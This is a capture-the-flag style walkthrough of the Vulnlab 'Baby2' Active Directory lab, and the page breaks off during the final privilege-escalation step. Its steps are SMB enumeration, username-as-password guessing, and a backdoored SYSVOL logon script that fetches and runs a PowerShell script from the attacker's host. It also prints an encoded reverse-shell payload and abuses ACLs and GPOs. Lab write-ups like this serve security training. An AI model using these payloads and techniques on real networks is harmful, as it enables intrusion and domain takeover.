POSTS

VULNLAB: Baby2

Baby2 is a medium-rated Active Directory machine on Vulnlab. The attack path involves initial SMB enumeration, password spraying to gain low-privileged domain user access, replacing a login VBS script in SYSVOL for a reverse shell, and escalating privileges by abusing GPO (Group Policy Object) DACL misconfigurations.

VULNLAB: Baby2
3421 words · 17 min

Overview

  • Type Machines
  • OS Windows
  • Severity Medium
  • Creator xct & r0BIT
  • Release date 2023 Sep 8

Enumeration

Start the instance via Discord and let’s go:

image

10.10.84.121

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.64.103                      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-19 14:10 JST
Nmap scan report for 10.10.64.103
Host is up (0.27s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2025-01-19T04:58:23
|_Not valid after:  2026-01-19T04:58:23
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2025-01-19T04:58:23
|_Not valid after:  2026-01-19T04:58:23
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Not valid before: 2025-01-19T04:58:23
|_Not valid after:  2026-01-19T04:58:23
|_ssl-date: TLS randomness does not represent time
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-19T05:14:11+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BABY2
|   NetBIOS_Domain_Name: BABY2
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: baby2.vl
|   DNS_Computer_Name: dc.baby2.vl
|   DNS_Tree_Name: baby2.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-19T05:13:31+00:00
| ssl-cert: Subject: commonName=dc.baby2.vl
| Not valid before: 2025-01-18T05:07:12
|_Not valid after:  2025-07-20T05:07:12
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
53136/tcp open  msrpc         Microsoft Windows RPC
63800/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-19T05:13:34
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
  • Found a domain controller of the domain baby.vl.
  • Add dc.baby2.vl, baby2.vl in in /etc/hosts

SMB Shared folder (445/tcp)

List shared folders using the guest account:

$ nxc smb dc.baby2.vl -u guest -p '' --shares
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.103    445    DC               [+] baby2.vl\guest: 
SMB         10.10.64.103    445    DC               [*] Enumerated shares
SMB         10.10.64.103    445    DC               Share           Permissions     Remark
SMB         10.10.64.103    445    DC               -----           -----------     ------
SMB         10.10.64.103    445    DC               ADMIN$                          Remote Admin
SMB         10.10.64.103    445    DC               apps            READ            
SMB         10.10.64.103    445    DC               C$                              Default share
SMB         10.10.64.103    445    DC               docs                            
SMB         10.10.64.103    445    DC               homes           READ,WRITE      
SMB         10.10.64.103    445    DC               IPC$            READ            Remote IPC
SMB         10.10.64.103    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.64.103    445    DC               SYSVOL                          Logon server share 

Found:

  • apps with read only access
  • homes with read and write access
  • The server is Windows Server 2022 so pretty new with a build 20348

We should not be allowed to view these shared folder by default with null credentials.

We can also do the same but filtering the output with only READ/WRITE access:

$ nxc smb dc.baby2.vl -u guest -p '' --shares --filter-shares READ WRITE
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.103    445    DC               [+] baby2.vl\guest: 
SMB         10.10.64.103    445    DC               [*] Enumerated shares
SMB         10.10.64.103    445    DC               Share           Permissions     Remark
SMB         10.10.64.103    445    DC               -----           -----------     ------
SMB         10.10.64.103    445    DC               apps            READ            
SMB         10.10.64.103    445    DC               homes           READ,WRITE      
SMB         10.10.64.103    445    DC               IPC$            READ            Remote IPC
SMB         10.10.64.103    445    DC               NETLOGON        READ            Logon server share 

List all readable files:

$ nxc smb dc.baby2.vl -u guest -p '' -M spider_plus                     
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.103    445    DC               [+] baby2.vl\guest: 
SPIDER_PLUS 10.10.64.103    445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.64.103    445    DC               [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.64.103    445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.64.103    445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.64.103    445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.64.103    445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.64.103    445    DC               [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.64.103    445    DC               [*] Enumerated shares
SMB         10.10.64.103    445    DC               Share           Permissions     Remark
SMB         10.10.64.103    445    DC               -----           -----------     ------
SMB         10.10.64.103    445    DC               ADMIN$                          Remote Admin
SMB         10.10.64.103    445    DC               apps            READ            
SMB         10.10.64.103    445    DC               C$                              Default share
SMB         10.10.64.103    445    DC               docs                            
SMB         10.10.64.103    445    DC               homes           READ,WRITE      
SMB         10.10.64.103    445    DC               IPC$            READ            Remote IPC
SMB         10.10.64.103    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.64.103    445    DC               SYSVOL                          Logon server share 
SPIDER_PLUS 10.10.64.103    445    DC               [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.64.103.json".
SPIDER_PLUS 10.10.64.103    445    DC               [*] SMB Shares:           8 (ADMIN$, apps, C$, docs, homes, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.64.103    445    DC               [*] SMB Readable Shares:  4 (apps, homes, IPC$, NETLOGON)
SPIDER_PLUS 10.10.64.103    445    DC               [*] SMB Writable Shares:  1 (homes)
SPIDER_PLUS 10.10.64.103    445    DC               [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.64.103    445    DC               [*] Total folders found:  12
SPIDER_PLUS 10.10.64.103    445    DC               [*] Total files found:    3
SPIDER_PLUS 10.10.64.103    445    DC               [*] File size average:    966.67 B
SPIDER_PLUS 10.10.64.103    445    DC               [*] File size min:        108 B
SPIDER_PLUS 10.10.64.103    445    DC               [*] File size max:        1.76 KB
$ cat /tmp/nxc_hosted/nxc_spider_plus/10.10.64.103.json
{
    "NETLOGON": {
        "login.vbs": {
            "atime_epoch": "2023-09-02 23:55:51",
            "ctime_epoch": "2023-08-23 04:28:18",
            "mtime_epoch": "2023-09-02 23:55:51",
            "size": "992 B"
        }
    },
    "apps": {
        "dev/CHANGELOG": {
            "atime_epoch": "2023-09-08 04:16:15",
            "ctime_epoch": "2023-09-08 04:13:40",
            "mtime_epoch": "2023-09-08 04:20:13",
            "size": "108 B"
        },
        "dev/login.vbs.lnk": {
            "atime_epoch": "2023-09-08 04:13:23",
            "ctime_epoch": "2023-09-08 04:13:04",
            "mtime_epoch": "2023-09-08 04:20:13",
            "size": "1.76 KB"
        }
    },
    "homes": {}
}  

Found 2 files in apps/dev:

  • CHANGELOG
  • login.vbs.lnk

Get all:

$ smbclient \\\\dc.baby2.vl\\apps -N                                                        
Try "help" to get a list of possible commands.
smb: \> cd dev
smb: \dev\> mget *
Get file CHANGELOG? Y
getting file \dev\CHANGELOG of size 108 as CHANGELOG (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Get file login.vbs.lnk? Y
getting file \dev\login.vbs.lnk of size 1800 as login.vbs.lnk (1.6 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \dev\> quit

Check the content:

$ cat CHANGELOG    
[0.2]

- Added automated drive mapping

[0.1]

- Rolled out initial version of the domain logon script                                                                                                                                    

Maybe that can be interesting for the future

image

The destination of the link is a login script in the SYSVOL share so not possible to access currently without credentials

Let’s dig into homes as maybe we can get the list of users:

$ smbclient \\\\dc.baby2.vl\\homes -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 19 14:41:04 2025
  ..                                  D        0  Wed Aug 23 05:10:21 2023
  Amelia.Griffiths                    D        0  Wed Aug 23 05:17:06 2023
  Carl.Moore                          D        0  Wed Aug 23 05:17:06 2023
  Harry.Shaw                          D        0  Wed Aug 23 05:17:06 2023
  Joan.Jennings                       D        0  Wed Aug 23 05:17:06 2023
  Joel.Hurst                          D        0  Wed Aug 23 05:17:06 2023
  Kieran.Mitchell                     D        0  Wed Aug 23 05:17:06 2023
  library                             D        0  Wed Aug 23 05:22:47 2023
  Lynda.Bailey                        D        0  Wed Aug 23 05:17:06 2023
  Mohammed.Harris                     D        0  Wed Aug 23 05:17:06 2023
  Nicola.Lamb                         D        0  Wed Aug 23 05:17:06 2023
  Ryan.Jenkins                        D        0  Wed Aug 23 05:17:06 2023

We make an one-liner to grab all of these usernames from the SMB session and convert it into a list of usernames:

$ smbclient -c 'ls' \\\\dc.baby2.vl\\homes -N | awk '{print $1}' | grep [A-Za-z] > users.txt
                                                                                                                                    
$ cat users.txt                                        
Amelia.Griffiths
Carl.Moore
Harry.Shaw
Joan.Jennings
Joel.Hurst
Kieran.Mitchell
library
Lynda.Bailey
Mohammed.Harris
Nicola.Lamb
Ryan.Jenkins

Quick check if any of these users are vulnerable to ASREPRoasting:

$ nxc ldap dc.baby2.vl -u users.txt -p '' --asreproast asreproast_output.txt
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)

Double check with impacket:

$ impacket-GetUserSPNs -dc-ip 10.10.64.103 -dc-host dc.baby2.vl -usersfile users.txt -no-pass baby2.vl/'guest'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[-] Principal: Amelia.Griffiths - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Carl.Moore - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Harry.Shaw - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Joan.Jennings - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Joel.Hurst - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Kieran.Mitchell - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: library - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Lynda.Bailey - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Mohammed.Harris - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Nicola.Lamb - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Ryan.Jenkins - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)

Failed no one is vulnerable

Password Guessing

We will check if any user is using his username as his password:

$ nxc smb dc.baby2.vl -u users.txt -p users.txt --no-bruteforce --continue-on-success                         
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.103    445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE 
SMB         10.10.64.103    445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         10.10.64.103    445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE 
SMB         10.10.64.103    445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE 
SMB         10.10.64.103    445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE 
SMB         10.10.64.103    445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE 
SMB         10.10.64.103    445    DC               [+] baby2.vl\library:library 
SMB         10.10.64.103    445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE 
SMB         10.10.64.103    445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE 
SMB         10.10.64.103    445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE 
SMB         10.10.64.103    445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE 

Found Carl.Moore and library

As now we have some domain accounts then let’s check if any of these users are vulnerable to Kerberoasting:

$ nxc ldap dc.baby2.vl -u 'Carl.Moore' -p 'Carl.Moore' --kerberoasting kerberoasting_output.txt
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
LDAP        10.10.64.103    389    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
LDAP        10.10.64.103    389    DC               Bypassing disabled account krbtgt 
LDAP        10.10.64.103    389    DC               No entries found!
LDAP        10.10.64.103    389    DC               [-] Error with the LDAP account used
                                                                                                                                    
$ nxc ldap dc.baby2.vl -u 'library' -p 'library' --kerberoasting kerberoasting_output.txt
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
LDAP        10.10.64.103    389    DC               [+] baby2.vl\library:library 
LDAP        10.10.64.103    389    DC               Bypassing disabled account krbtgt 
LDAP        10.10.64.103    389    DC               No entries found!
LDAP        10.10.64.103    389    DC               [-] Error with the LDAP account used

Failed

Let’s check if we can access to more SMB shared folders with these new acount:

$ nxc smb dc.baby2.vl -u 'Carl.Moore' -p 'Carl.Moore' --shares --filter-shares READ WRITE
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.103    445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         10.10.64.103    445    DC               [*] Enumerated shares
SMB         10.10.64.103    445    DC               Share           Permissions     Remark
SMB         10.10.64.103    445    DC               -----           -----------     ------
SMB         10.10.64.103    445    DC               apps            READ,WRITE      
SMB         10.10.64.103    445    DC               docs            READ,WRITE      
SMB         10.10.64.103    445    DC               homes           READ,WRITE      
SMB         10.10.64.103    445    DC               IPC$            READ            Remote IPC
SMB         10.10.64.103    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.64.103    445    DC               SYSVOL          READ            Logon server share 
$ nxc smb dc.baby2.vl -u 'library' -p 'library' --shares --filter-shares READ WRITE
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.103    445    DC               [+] baby2.vl\library:library 
SMB         10.10.64.103    445    DC               [*] Enumerated shares
SMB         10.10.64.103    445    DC               Share           Permissions     Remark
SMB         10.10.64.103    445    DC               -----           -----------     ------
SMB         10.10.64.103    445    DC               apps            READ,WRITE      
SMB         10.10.64.103    445    DC               docs            READ,WRITE      
SMB         10.10.64.103    445    DC               homes           READ,WRITE      
SMB         10.10.64.103    445    DC               IPC$            READ            Remote IPC
SMB         10.10.64.103    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.64.103    445    DC               SYSVOL          READ            Logon server share 

Both can READ/WRITE to apps, homes and docs and can READ to sysvol

VBS Login script abusing (amelia.griffiths) (Baby2_User)

We see before that the login.vbs file is in C:\Windows\SYSVOL\sysvol\baby2.vl\scripts\login.vbs.

Let’s check it:

$ impacket-smbclient library:library@dc.baby2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# use SYSVOL
# ls
drw-rw-rw-          0  Wed Aug 23 02:37:46 2023 .
drw-rw-rw-          0  Wed Aug 23 02:37:46 2023 ..
drw-rw-rw-          0  Wed Aug 23 02:37:46 2023 baby2.vl
# cd baby2.vl
# ls
drw-rw-rw-          0  Wed Aug 23 02:43:55 2023 .
drw-rw-rw-          0  Wed Aug 23 02:37:46 2023 ..
drw-rw-rw-          0  Sun Jan 19 14:07:45 2025 DfsrPrivate
drw-rw-rw-          0  Wed Aug 23 02:37:46 2023 Policies
drw-rw-rw-          0  Wed Aug 23 04:28:27 2023 scripts
# cd scripts
# ls
drw-rw-rw-          0  Wed Aug 23 04:28:27 2023 .
drw-rw-rw-          0  Wed Aug 23 02:43:55 2023 ..
-rw-rw-rw-        992  Sat Sep  2 23:55:51 2023 login.vbs
# cat login.vbs
Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")    
  
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
    
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
    
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    
    Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

Then grab it:

# get login.vbs
# exit

This script looks to be mapping the network drives within the SMB instance.

We can see at the end that the SMB shared folders apps and docs are being mapped to V and L respectively.

If this script is a login script that is ran when a user logs in, then we can potentially alter this to give us a reverse shell on the users machine once they log in.

To validate our attack hypothesis, we will check using BloodHound if we can find any user using the login script.

Let’s collect:

nxc ldap dc.baby2.vl -u 'library' -p 'library' --bloodhound -c all,LoggedOn --dns-server 10.10.64.103

Let’s injest and after a quick review we found a user using a login script:

image

Let’s abuse the VBS login script !

We keep a copy of the original one:

$ cp login.vbs login.vbs.org

The modify it adding the line below before the line MapNetworkShare "\\dc.baby2.vl\apps", "V" to upload and execute our PowerShell reverse shell:

Set oShell = CreateObject("WScript.Shell")
oShell.Run("powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.4.253/rev_posh.ps1');")

OR

CreateObject("WScript.Shell").Run "powershell -ep bypass -w hidden IEX (New-Object System.Net.Webclient).DownloadString('http://10.8.4.253/rev_posh.txt')"

We can also add an additional line like this if we thiking to use Reponder to get the NTLMHash and try to crack it with Hashcat:

MapNetworkShare "\\10.8.4.253\docs", "L"

Our PoSH Rev Shell is the classical:

$ cat rev_posh.txt          
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADQALgAyADUAMwAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

Set a local web server:

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Set a Metasploit listener:

$ msfconsole -qx "use exploit/multi/handler; set payload windows/shell_reverse_tcp; set LHOST tun0; set LPORT 443; set ExitOnSession false; exploit -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/shell_reverse_tcp
LHOST => tun0
LPORT => 443
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.8.4.253:443 
msf6 exploit(multi/handler) > 

Upload our malicious login.vbs:

$ smbclient -c 'cd \baby2.vl\scripts\; rm login.vbs; put login.vbs' \\\\dc.baby2.vl\\SYSVOL -U BABY2/'library'%'library'
putting file login.vbs as \baby2.vl\scripts\login.vbs (1.4 kb/s) (average 1.4 kb/s)

After few minutes we receive a callback and get our shell, then we upgrade it to get a full Meterpreter shell:

msf6 exploit(multi/handler) > [*] Command shell session 1 opened (10.8.4.253:443 -> 10.10.64.103:54062) at 2025-01-19 16:43:09 +0900

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x86/windows               10.8.4.253:443 -> 10.10.64.103:54062 (10.10.64.103)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

PS C:\Windows\system32> whoami
baby2\amelia.griffiths

Then we can’t find a flag in the Desktop’s user but we found the flag Baby2_User in C:\

PS C:\Users\Amelia.Griffiths> cd c:\
PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name                     
----                 -------------         ------ ----                     
d-----          5/8/2021   1:20 AM                PerfLogs                 
d-r---         8/27/2023  10:02 AM                Program Files            
d-----         8/22/2023  10:30 AM                Program Files (x86)      
d-----         8/22/2023   1:10 PM                shares                   
d-----         8/22/2023  12:35 PM                temp                     
d-r---         8/22/2023  12:54 PM                Users                    
d-----         8/27/2023  10:12 AM                Windows                  
-a----         8/22/2023  12:51 PM             36 user.txt                 


PS C:\> type user.txt
VL{36a82a40b7dce3fa5b07a0cc81a45d22}

GPO Object controling

image

amelia.griffiths is a member of non standard groups office and legacy and she can RDP too

The legacy group has Outbound Object Control:

image

She has WriteOwner on both:

  • the GPO-Management OU (organizational Unit)
  • the gpoadm user

WriteOwner essentially allows our user to modify the ownership of the object. If we can change the ownership of this object, then we can make the owner of it ourselves.

Let’s use PowerView to change the owner of the gpoadm user to Amelia.Griffiths.

image

gpoadm user has GenericAll on two GPOs that we can use to create a Domain Admin account

Upload PowerView:

PS C:\windows\tasks> iwr http://10.8.4.253/PowerView.ps1 -o pv.ps1

Import the module:

PS C:\windows\tasks> Import-Module .\pv.ps1

Change the owner of gpoadm user:

PS C:\windows\tasks> Set-DomainObjectOwner -Identity gpoadm -OwnerIdentity Amelia.Griffiths

Double check:

PS C:\windows\tasks> Get-ADUser gpoadm | ForEach-Object {Get-ACL "AD:\$($_.DistinguishedName)" | Select-Object -ExpandProperty Owner}
BABY2\Amelia.Griffiths

Add an ACL to the gpoadm user to give ourselves GenericAll on the account:

PS C:\windows\tasks> Add-DomainObjectACL -PrincipalIdentity Amelia.Griffiths -TargetIdentity gpoadm -Rights All

We should be able to use bloodyAD to change the user’s passwords, but that requires us to have valid credentials to Amelia.Griffiths, which we don’t have.

Luckily enough there is a Window alternative that we can do within our shell as Amelia.Griffiths:

PS C:\windows\tasks> $cred = ConvertTo-SecureString 'Azerty1234!' -AsPlainText -Force
PS C:\windows\tasks> Set-DomainUserPassword gpoadm -AccountPassword $cred

Double check:

$ nxc smb dc.baby2.vl -u gpoadm -p 'Azerty1234!' 
SMB         10.10.64.103    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.103    445    DC               [+] baby2.vl\gpoadm:Azerty1234! 

We have full control to gpoadm user

GPO Abusing (Baby2_Root)

As gpoadm user, we have GenericALL to the Default Domain Policy GPO.

We need the GPO ID to abuse it:

image

We use pyGPOAbuse to automate the exploitation of this GPO.

This tool will modify the GPO to create a scheduled task and execute a respective command that will give us a new Domain Admin to authenticate as.

$ git clone https://github.com/Hackndo/pyGPOAbuse.git

By default, pyGPOAbuse create a user with the credentials john:H4x00r123..:

$ python3 pyGPOAbuse/pygpoabuse.py -dc-ip baby2.vl -gpo-id "6ac1786c-016f-11d2-945f-00c04fb984f9" baby2.vl/gpoadm:'Azerty1234!'

/home/user/Downloads/VULNLAB/BABY2/pyGPOAbuse/pygpoabuse/scheduledtask.py:54: SyntaxWarning: invalid escape sequence '\%'
  self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%LogonDomain%\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""
/home/user/Downloads/VULNLAB/BABY2/pyGPOAbuse/pygpoabuse/scheduledtask.py:54: SyntaxWarning: invalid escape sequence '\%'
